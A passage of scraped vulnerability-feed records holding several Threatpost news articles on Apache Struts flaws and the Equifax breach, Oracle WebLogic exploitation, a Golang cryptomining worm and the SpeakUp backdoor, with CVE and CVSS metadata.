Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,\u201d he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. \u201cOn top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.\u201d\n\n[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts\u2019 behavior.\n\n\u201cOn the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,\u201d said Yue Mo, referring to the infamous vulns (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).\n\nTim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.\n\n\u201cIn the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,\u201d he explained. \u201cThe prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turns requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern \u2013 and this concern relates to any library framework.\u201d\n\n## Anatomy of the Flaw\n\nThe vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team\u2019s findings.\n\n\u201cAttackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,\u201d they explained. \u201cThe value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.\u201d\n\nBecause the issue affects the core of Struts, there are at least two separate attack vectors \u2013 and potentially many more.\n\nIn the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined in either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.\n\nThe researchers explained: \u201cAn example of a struts.xml configuration that is potentially vulnerable: the <action \u2026> tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.\u201d\n\nThe second attack vector has to do with the fact that Struts supports page templates inside <result> tags in the Struts configuration: \u201cThe use of URL tags in such pages is potentially unsafe if the template is referred to from an <action> tag that does not provide a namespace attribute (or specifies a wildcard namespace),\u201d the researchers said. \u201cYour application is vulnerable if the template contains an <s:url \u2026> tag without an action or value attribute.\u201d\n\nResearchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to \u201ctrue\u201d in the Struts configuration \u2013 a default state if the application uses the popular Struts Convention plugin. Also, the application\u2019s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. \u201c/*\u201d).\n\n\u201cThis applies to actions and namespaces specified in the Struts configuration file (e.g. <action namespace=\u201dmain\u201d>), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,\u201d they explained.\n\nThat said, they also cautioned that other attack vectors may emerge that apply to different configurations.\n\n\u201cWhether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,\u201d the firm said. \u201cNote that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.\u201d\n\nThis is a critical point, according to Mackey. \u201cValidating the input to a function requires a clear definition of what is acceptable,\u201d he said. \u201cIt equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it\u2019s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued as its unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.\u201d\n\nPavel Avgustinov, vice president of QL Engineering at Semmle, laid out what\u2019s at stake in a media statement: \u201cCritical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,\u201d he said. \u201cA hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It\u2019s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.\u201d\n", "cvss3": {}, "published": "2018-08-23T16:46:57", "type": "threatpost", "title": "Apache Struts 2 Flaw Uncovered: \u2018More Critical Than Equifax Bug\u2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9805", "CVE-2018-11776"], "modified": "2018-08-23T16:46:57", "id": "THREATPOST:D5150098043DAE7CDF2E31618C33F5D2", "href": "https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:10", "description": "A group of developers behind Apache Struts, believed by some to be the culprit behind [last week\u2019s Equifax breach](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), took umbrage with those claims over the weekend.\n\nRen\u00e9 Gielen, vice president of the Apache Struts Project Management Committee (PMC) at the Apache Software Foundation, wrote Saturday that if Struts was targeted, it\u2019s unclear which vulnerability, if any was exploited.\n\n[The letter,](<https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax>) which was written on behalf of the Struts PMC, was spurred by an internal analyst report published last week that suggested data from Equifax\u2019s servers was breached via an unnamed Apache Struts flaw.\n\nThe report penned by Jeffrey Meuler, a senior research analyst with Baird Equity Research, the research arm of the financial services firm Robert W. Baird & Co, did not provide a source for the finding. Meuler did not immediately return a request for further comment when contacted on Monday.\n\nGielen\u2019s letter took particular issue with a Quartz.com article that initially alleged CVE-2017-9805, a critical remote code execution vulnerability that the ASF [patched last Tuesday](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), was the Struts vulnerability to blame for the breach of 143 million Americans\u2019 records. The [Quartz article](<https://qz.com/1073221/the-hackers-who-broke-into-equifax-exploited-a-nine-year-old-security-flaw/>) \u2013 since edited \u2013 initially claimed that CVE-2017-9805 had existed in the wild for nine years, something Gielen had a hard time buying. Gielen said Saturday that since the breach was detected back in July, it\u2019s likely the Equifax attackers either used an unknown Struts zero day or an earlier announced vulnerability on an unpatched Equifax server.\n\nGielen says the ASF takes \u201cenormous efforts\u201d to secure software it produces, like Struts, and makes a conscious effort to hold back sensitive information around vulnerabilities. There is no silver bullet for preventing exploits from surfacing in the wild however.\n\n\u201cSince vulnerability detection and exploitation has become a professional business, it is and always will be likely that attacks will occur even before we fully disclose the attack vectors, by reverse engineering the code that fixes the vulnerability in question or by scanning for yet unknown vulnerabilities.\u201d\n\nIf the attackers had used CVE-2017-9805, it would have been considered a zero day at the time, but according to Gielen, the Apache PMC was only recently notified of the vulnerability \u2013 something it quickly remedied.\n\n\u201cWe were notified just recently on how a certain piece of code can be misused, and we fixed this ASAP,\u201d Gielen said, \u201cWhat we saw here is common software engineering business \u2014 people write code for achieving a desired function, but may not be aware of undesired side-effects. Once this awareness is reached, we as well as hopefully all other library and framework maintainers put high efforts into removing the side-effects as soon as possible. It\u2019s probably fair to say that we met this goal pretty well in case of CVE-2017-9805.\u201d\n\nGielen concluded his letter with a series of best practices for businesses who use Apache Struts to follow, including being aware which framework/libraries are used in their setup, that processes to roll out security fixes are established, and perhaps most importantly, to understand that complex software can contain flaws.\n\nAn Apache spokeswoman [told Reuters on Friday](<https://www.reuters.com/article/us-equifax-cyber/criticism-of-equifax-data-breach-response-mounts-shares-tumble-idUSKCN1BJ1NF>) that it appeared Equifax had not applied patches for flaws discovered this year.\n\nIt\u2019s unclear exactly which vulnerability the spokeswoman was referring to. The Struts vulnerability fixed last week affected all web apps that used the framework\u2019s REST plugin. Another Struts vulnerability, CVE-2017-5638, was publicized and incorporated into Metasploit [in March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>). That flaw stemmed from Struts\u2019 Jakarta Multipart parser upload functionality and allowed an attacker to execute requests to an Apache webserver. Researchers with Cisco Talos, [who found the bug](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>), said it was being exploited in the wild when it was disclosed.\n\nResearchers with Contrast Security posit it\u2019s more likely the attacker used CVE-2017-5638, an expression language injection vulnerability leveraged via the content-type header, to hit Equifax.\n\n\u201cThe first vulnerability from March seems much more likely because it\u2019s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,\u201d Jeff Williams, Contrast\u2019s co-founder and chief technology officer, [wrote Saturday](<https://www.contrastsecurity.com/security-influencers/a-week-of-web-application-hacks-and-vulnerabilities>).\n\nWilliams echoed a few sentiments made by Gielen, including the fact that maintaining the security of libraries can be tricky but should remain a focus for businesses.\n\n\u201cKeeping libraries up to date isn\u2019t a small amount of work, as these changes come out frequently. Often these changes require rewriting, retesting, and redeploying the application, which can take months. I have recently talked with several large organizations that took over four months to deal with CVE-2017-5638,\u201d Williams said.\n\nEquifax, which has yet to respond to a request for comment for this article or [previous](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) [articles](<https://threatpost.com/many-questions-few-answers-for-equifax-breach-victims/127886/>), remains in damage control mode.\n\nThe company on Monday said it would be changing how it generates PINs for customers who want to initiate a security freeze on their accounts. The response was presumably in response to a series of tweets that went viral on Friday night calling out Equifax for using hardcoded PINs that mirrored the date and time they were requested, a format the company allegedly has followed for more than a decade.\n\n> OMG, Equifax security freeze PINs are worse than I thought. If you froze your credit today 2:15pm ET for example, you'd get PIN 0908171415.\n> \n> \u2014 Tony Webster (@webster) [September 9, 2017](<https://twitter.com/webster/status/906346071210778625>)\n\nThe company said in an update to its site that going forward consumers placing a security freeze will be given a randomly generated PIN. Users who previously froze their credit will have to mail the company directly to change it, however.\n\n> Equifax's security freeze system is now generating random PINs. If you already got one though, you have to MAIL them to change it. Fail. [pic.twitter.com/fOrtvgkmGd](<https://t.co/fOrtvgkmGd>)\n> \n> \u2014 Tony Webster (@webster) [September 11, 2017](<https://twitter.com/webster/status/907242378829889537>)\n\nThe company on Monday also apologized for lengthy call center wait times and stressed that users who sign up for TrustedID Premier, the company\u2019s ID theft protection and credit monitoring service, will not be charged as soon as the year runs out.\n\nThe company also took a moment on Monday to reiterate that signing up for the free credit monitoring service doesn\u2019t waive a consumer\u2019s right to take legal action.\n\nThe company clarified its TrustedID Premier policy on Friday afternoon after it was pressed repeated by consumers and politicians alike. One politician in particular, Eric Schneiderman, New York\u2019s Attorney General, opened a formal investigation into the breach on Friday, calling out the company\u2019s arbitration clause policy.\n\nAs expected multiple lawsuits have been filed against the company in wake of the breach. One class action suit, filed late Thursday night, alleges Equifax \u201cnegligently failed to maintain adequate technological safeguards to protect [the plaintiffs\u2019] information from unauthorized access by hackers.\u201d The suit seeks as much as $70 billion in damages nationally.\n\n\u201cEquifax knew and should have known that failure to maintain adequate technological safeguards would eventually result in a massive data breach,\u201d the complaint also reads.\n\n_*This article was updated at 5 p.m. to include insight from Contrast Security re: CVE-2017-5638 and Equifax._\n", "cvss3": {}, "published": "2017-09-11T15:02:31", "type": "threatpost", "title": "Apache Foundation Refutes Involvement in Equifax Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-20T19:57:18", "id": "THREATPOST:477B6029652B76463B5C5B7155CDF736", "href": "https://threatpost.com/apache-foundation-refutes-involvement-in-equifax-breach/127910/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:47:52", "description": "Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. Even though there\u2019s a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks \u2013 especially since the bug is \u201ctrivial\u201d to exploit.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Oracle released an out-of-band patch on April 26, 2019 \u2013 though exploitation for what was then a zero-day had already begun, researchers said. Quickly thereafter, attacks distributing a never-before-seen [ransomware variant called \u201cSodinokibi\u201d emerged](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>); and then attacks [spreading a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, which is used to launch distributed-denial-of-service (DDoS) and cryptojacking attacks.\n\nNow, other attacks are starting to snowball, with no sign of abating.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOnce the vulnerability was made public with the release of the patch, numerous instances of proof-of-concept (PoC) code exploiting the vulnerability were released,\u201d Unit 42 researchers said, in a posting [late last week](<https://unit42.paloaltonetworks.com/attackers-increasingly-targeting-oracle-weblogic-server-vulnerability-for-xmrig-and-ransomware/>). \u201cPreliminary indicators reveal over 600 exploitation attempts targeting CVE-2019-2725 on Palo Alto Networks soak sites and we expect this number to increase rapidly.\u201d\n\nThey added that a scan showed more than 41,000 publicly accessible WebLogic instances in the wild.\n\n\u201cWith this many publicly available WebLogic instances on the internet, as well as an unknown number of private instances in enterprise environments, we expect an escalation of exploitation attempts in the coming days and weeks,\u201d according to the researchers.\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. Palo Alto pointed out that exploitation does not require any interaction from the user \u2013 a remote, unauthenticated user can send an HTTP request containing a crafted SOAP payload and obtain remote code execution trivially.\n\n\u201cPeople are on the lookout for critical vulnerabilities and seek to jump on them quickly so they can exploit them before patches are applied,\u201d Ryan Olson, vice president of threat intelligence for Unit 42 told Threatpost. \u201cAs we outline in the blog, this isn\u2019t a difficult vulnerability to exploit, particularly given it\u2019s similarity to a previous vulnerability from 2017.\u201d\n\nThat previous vulnerability (CVE-2017-10271) allows a remote, unauthenticated attacker to pass Java-class objects with arbitrary contents, allowing for remote code-execution and in many ways provides a blueprint for the new flaw, according to the researchers.\n\n\u201cThis reinforces the importance of good testing for variant vulnerabilities by vendors when patching vulnerabilities,\u201d Olson told Threatpost.\n\n## XMRig and GandCrab\n\nUnit 42 researchers have observed a wide variety of payloads in addition to Muhstik and Sodinokibi, such as a PowerShell loader that fetches the open-source Monero cryptominer known as XMRig. In addition to dropping the miner, it terminates any legitimate Oracle update services that would patch the underlying WebLogic vulnerability, and establishes persistence by copying itself and creating a scheduled task that masquerades as the Oracle update service.\n\nOther attacks are pushing ransomware to infected victims, including [the infamous GandCrab](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>).\n\n\u201cAt this point, it appears that both ransomware and cryptomining have settled into a stable pattern in terms of use by cybercriminals,\u201d Olson told Threatpost.\n\nThe popularity of WebLogic Server, combined with its tendency to be deployed in business-critical environments, creates an attractive target set for cybercriminals; and exacerbating matters is the fact that there could be \u201can unknown number of private instances in enterprise environments,\u201d Unit 42 researchers said. There are not directly exposed to the web, but an attacker that\u2019s able to penetrate a corporate network could easily uncover them.\n\n\u201cThese would essentially be internal network deployments,\u201d Olson said. \u201cThe attacks wouldn\u2019t be different, but the attackers would have to find a means to launch the attack so that it gets into the internal network.\u201d\n\nBusinesses should make every effort to patch, and patch quickly, Olson noted.\n\n\u201cThis is a reminder that the window for exploitation has narrowed and that enterprises need to be able to deploy critical patches like this in a matter of hours and days, not weeks and months,\u201d he told Threatpost.\n", "cvss3": {}, "published": "2019-05-06T20:04:55", "type": "threatpost", "title": "Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725"], "modified": "2019-05-06T20:04:55", "id": "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "href": "https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-14T22:23:27", "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but now has spread to Windows and other servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201c; and CVE-2018-20062 for the ThinkPHP framework.\n\nOther exploits that don\u2019t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. \u201cAs in other families of malwares, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others as the functions imported from other libraries are compiled in the binary itself. It also has a unique way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader pacyload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.\n\nOut of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file meanwhile is the malware\u2019s worm propagation mechanism. It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Theatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-25T18:30:59", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "modified": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-04T07:14:14", "description": "LAS VEGAS \u2014 A backdoor trojan dubbed \u201cSpeakUp\u201d has been spotted exploiting the Linux servers that run more than 90 percent of the top 1 million domains in the U.S. It uses a complex bag of tricks to infect hosts and to propagate, which analysts say could indicate that it\u2019s poised for a major offensive involving a vast number of infected hosts, potentially worldwide.\n\nAccording to Check Point research released Monday at the CPX360 event in Las Vegas, SpeakUp (so-named after its command-and-control domain, SpeakUpOmaha[dot]com) is being used in a cryptomining campaign that is gaining momentum and has targeted more than 70,000 servers worldwide so far in what could be the foundation for a very formidable botnet.\n\nSpeakUp targets on-premises servers as well as cloud-based machines, such as those hosted by Amazon Web Services; and, it doesn\u2019t stop at Linux: It also has the ability to infect MacOS devices.\n\nOded Vanunu, head of products vulnerability research for Check Point, told Threatpost that the scope of this attack includes all servers running ThinkPHP, Hadoop Yarn, Oracle WebLogic, Apache ActiveMQ and Red Hat JBoss. And, he said that since these software can be deployed on virtual servers, all cloud infrastructure are also prone to be affected.\n\nThe actual trojan itself can affect all Linux distributions and MacOS.\n\n## Infection Routine\n\nThe initial infection vector starts with targeting a recently reported RCE vulnerability in ThinkPHP (CVE-2018-20062); the code uses command-injection techniques for uploading a PHP shell that serves and executes a Perl backdoor.\n\nThe routine is heavily obfuscated: Using a GET request, exploit code is sent to the targeted server. The resulting uploaded PHP shell then sends another HTTP request to the targeted server, with a standard injection function that pulls the ibus payload and stores it. The payload execution is then kicked off using an additional HTTP request. That executes the Perl script, puts it to sleep for two seconds and deletes the file to remove any evidence of infection.\n\nAfter registering the victim machine with the C2, Check Point analysts found that SpeakUp continuously asks for new tasks on a fixed-interval basis of every three seconds. The C2 can say \u201cno task\u201d \u2013 or, it can tell it to execute arbitrary code on the local machine, download and execute a file from any remote server, kill or uninstall the program, or send updated fingerprint data.\n\n\u201cThe beauty is that the threat actor has a foothold on any infected server,\u201d Vanunu said. \u201cWhich means he can adapt new future vulnerabilities, and deploy the new code, which will attempt exploit further using new techniques. If the threat actor decides to implement some more infection techniques the number of bots could easily scale up.\u201d\n\nThe campaign would be immediately scaled as well, since a threat actor would be able to download a piece of malware to all infected hosts at once.\n\n\u201cThe infected hosts are checking the C2 server for new commands every three minutes,\u201d said Vanunu.\n\n\u201cThe threat actor [may also be able to] sell the infected hosts to any threat actor and deploy any type of malware to the highest bidder,\u201d he added.\n\n## Highly Sophisticated Propagation\n\nSpeakUp also comes equipped with a handy propagation script written in Python; its main functions are brute-forcing administrative panels using a pre-defined list of usernames and passwords; and scanning the network environment of the infected machine. For the latter function, it checks for availability of specific ports on servers that share the same internal and external subnet mask. The idea is to scan and infect more vulnerable Linux servers within its internal and external subnets, using a full bag of exploits.\n\nTo spread, SpeakUp\u2019s propagation code exploits known vulnerabilities in six different Linux distributions, including JBoss Enterprise Application Platform security bypass vulnerabilities (CVE-2012-0874); a JBoss Seam Framework remote code execution (RCE) flaw (CVE-2010-1871); a JBoss AS 3/4/5/6 RCE exploit; a Oracle WebLogic wls-wsat Component Deserialization RCE (CVE-2017-10271); a vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (CVE-2018-2894); a Hadoop YARN ResourceManager command-execution exploit; and an Apache ActiveMQ Fileserver File Upload RCE vulnerability (CVE-2016-3088).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01154122/SpeakUp-Infection-Rate.png>)\n\nSpeakUp\u2019s daily infection rate (click to enlarge)\n\n\u201cA successful exploitation of one of the vulnerabilities will result in deploying the original ibus script on the exploited server,\u201d according to Check Point\u2019s analysis, which added that it also has the capability to infect Macs.\n\n## A Bigger Threat in the Making?\n\nRight now, the observed file downloads that the backdoor is dropping are simple Monero-mining scripts. However, SpeakUp\u2019s authors have the ability to download any code they want to the servers. Check Point analysts said that the mining code could be a sort of beta test ahead of a much more concerning malware drop to come.\n\n\u201cAt the moment SpeakUp serves XMRig miners to its listening infected servers,\u201d according to the research. According to [XMRHunter,](<https://www.xmrhunter.com/>) the wallets hold a total of around 107 Monero coins right now, which is small potatoes in the grand scheme of things.\n\n\u201cSpeakUp\u2019s obfuscated payloads and propagation technique is beyond any doubt the work of a bigger threat in the making,\u201d according to the analysis. \u201cIt is hard to imagine anyone would build such a compound array of payloads just to deploy few miners. The threat actor behind this campaign can at any given time deploy additional payloads, potentially more intrusive and offensive. It has the ability to scan the surrounding network of an infected server and distribute the malware.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/01153817/SpeakUp-VT.png>)\n\nSpeakUp has no detections in 